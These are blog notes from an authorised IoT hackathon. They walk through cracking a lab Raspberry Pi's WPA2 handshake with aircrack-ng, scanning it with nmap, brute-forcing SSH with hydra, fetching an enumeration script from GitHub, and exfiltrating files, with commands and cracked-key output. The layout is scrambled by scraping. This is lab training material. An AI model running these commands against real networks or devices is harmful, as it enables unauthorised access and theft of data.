Hi! My name is Isaac Basque-Rice, I'm A Security Engineer and former Abertay Ethical Hacker, and this website is a repository for all the cool stuff I've done, enjoy!
From the 21st to the 28th of June 2021 I took part in an IoT device hackathon provided by CENSIS in collaboration with Abertay Uni. The following are my notes from the week or so that I had to do the project, I hope you enjoy reading this as much as I did doing it :).
Click here to read the full report
developer
account with directory monitoring
, which contained code for the sitepi
was the username for the raspberry pi, which is the default usernameiwconfig
and found adapter name wlp0s20f0u3
(using USB Wi-Fi adapter)sudo airmon-ng check kill; sudo airmon-ng start wlp0s20f0u3
which killed processes, disconnected me, then started the interface wlp0s20f0u3mon
in monitor modesudo airodump-sg wlp2s0mon
to capture BSSID for IoT-Demo-06 (B8:27:EB:B8:BB:F1)sudo airodump-ng -c 7 --bssid B8:27:EB:B8:BB:F1 -w WPAcrack wlp0s20f0u3mon --ignore-negative-one
-c
determines the channel for the wireless network--bssid
is the MAC address for the access point-w
is the file name prefix for the file which will contain the authorisation handshakewlp0s20f0u3mon
is the wireless interface--ignore-negative-one
fixes an error messageWPA2crack-01.cap
aircrack-ng -w words_small.txt -b B8:27:EB:B8:BB:F1 WPA2crack/WPA2crack-01.cap
aircrack-ng
cracks passwords-w
specifies wordlist, used words_small.txt
which was provided to me-b
specifies BSSID as captured earlierWPA2crack/WPA2crack-01.cap
was the handshake capture fed into the cracking tool Aircrack-ng 1.6
[00:00:01] 3261/3311 keys tested (3062.98 k/s)
Time left: 0 seconds 98.49%
KEY FOUND! [ valegorov ]
Master Key : 4C 99 CF BF 5B 80 C9 B8 F1 8F 71 4B 43 98 AB B1
78 6A 70 E2 A6 08 B6 99 E7 E8 A7 CF B5 AF DC 03
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : F1 61 45 F2 AD 27 E4 2E 99 88 CF 25 F0 A5 97 57
kit5min.pcapng
192.168.66.1
and 192.168.66.146
192.168.66.1
) is the Raspberry Pi device, the other device is my laptopnmap -sT -p- -vv -T5 192.168.66.1
) showed an additional 2 known ports in use
nmap -sT -p- -vv -A 192.168.66.1
to gather OS information, versions, scripts, and traceroute for the aforementioned ports
hydra -l pi -P words_small.txt ssh://192.168.66.1
words_small.txt
wordlistdeveloper
, repeated process
curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh; chmod 700 lse.sh
to get an enumeration tool called lsescp -r ~/Downloads/lse pi@192.168.66.1:~/Downloads/lse
to get the lse script to the remote device<!DOCTYPE html>
<head>
<title>Temperature Web Server</title>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="/static/styles/bootstrap.min.css" crossorigin="anonymous">
<!-- Optional theme -->
<link rel="stylesheet" href="/static/styles/bootstrap-theme.min.css" crossorigin="anonymous">
</head>
<meta http-equiv="refresh" content="15">
<body>
<h1>Temperature Web Server</h1>
<br />
<h2>Device (DEI)</h2>
<form method="POST">
<select id="SelectedDevice" name="SelectedDevice">
<option value="70B3D5499C1AA8FB" selected="selected">70B3D5499C1AA8FB</option>
</select>
<input type="submit" value="Select Device">
</form>
<br />
<h2>Heating currently: OFF</h2>
<h2>Room Currently: 29.0 ℃</h2>
<h2>Pressure: 1018.8mb </h2>
<h2>Humidity: 36.5% </h2>
<h2>Battery: 4.802V</h2>
<h2>DevEUI: 70B3D5499C1AA8FB</h2>
<h2>Name: Test LoPy4</h2>
</body>
</html>
/admin/
and /admin/timeline/
<!DOCTYPE html>
<head>
<title>PIR Web Server</title>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="/static/styles/bootstrap.min.css" crossorigin="anonymous">
<!-- Optional theme -->
<link rel="stylesheet" href="/static/styles/bootstrap-theme.min.css" crossorigin="anonymous">
</head>
<meta http-equiv="refresh" content="15">
<body>
<h1>PIR Web Server</h1>
<br />
<h2>Device (DEI)</h2>
<form method="POST">
<select id="SelectedDevice" name="SelectedDevice">
<option value="E24F43FFFE44CD2A">E24F43FFFE44CD2A</option>
</select>
<input type="submit" value="Select Device">
</form>
<br />
<h2>PIR Count: 0 activations </h2>
<h2>Room Currently: ℃</h2>
<h2>Battery: %</h2>
<h2>DevEUI: </h2>
<h2>Name: </h2>
</body>
</html>
tree -a
command in the root directory to get an overview of all files on the device, outputted to text file for review.
Exfil
pi
user, as well as other misc filesdeveloper
readme
which links to /etc/systemd/system
, files exfiltratedIf you learned something from this, why not send me over a little tip by way of thanks? No pressure but it would be much appreciated :)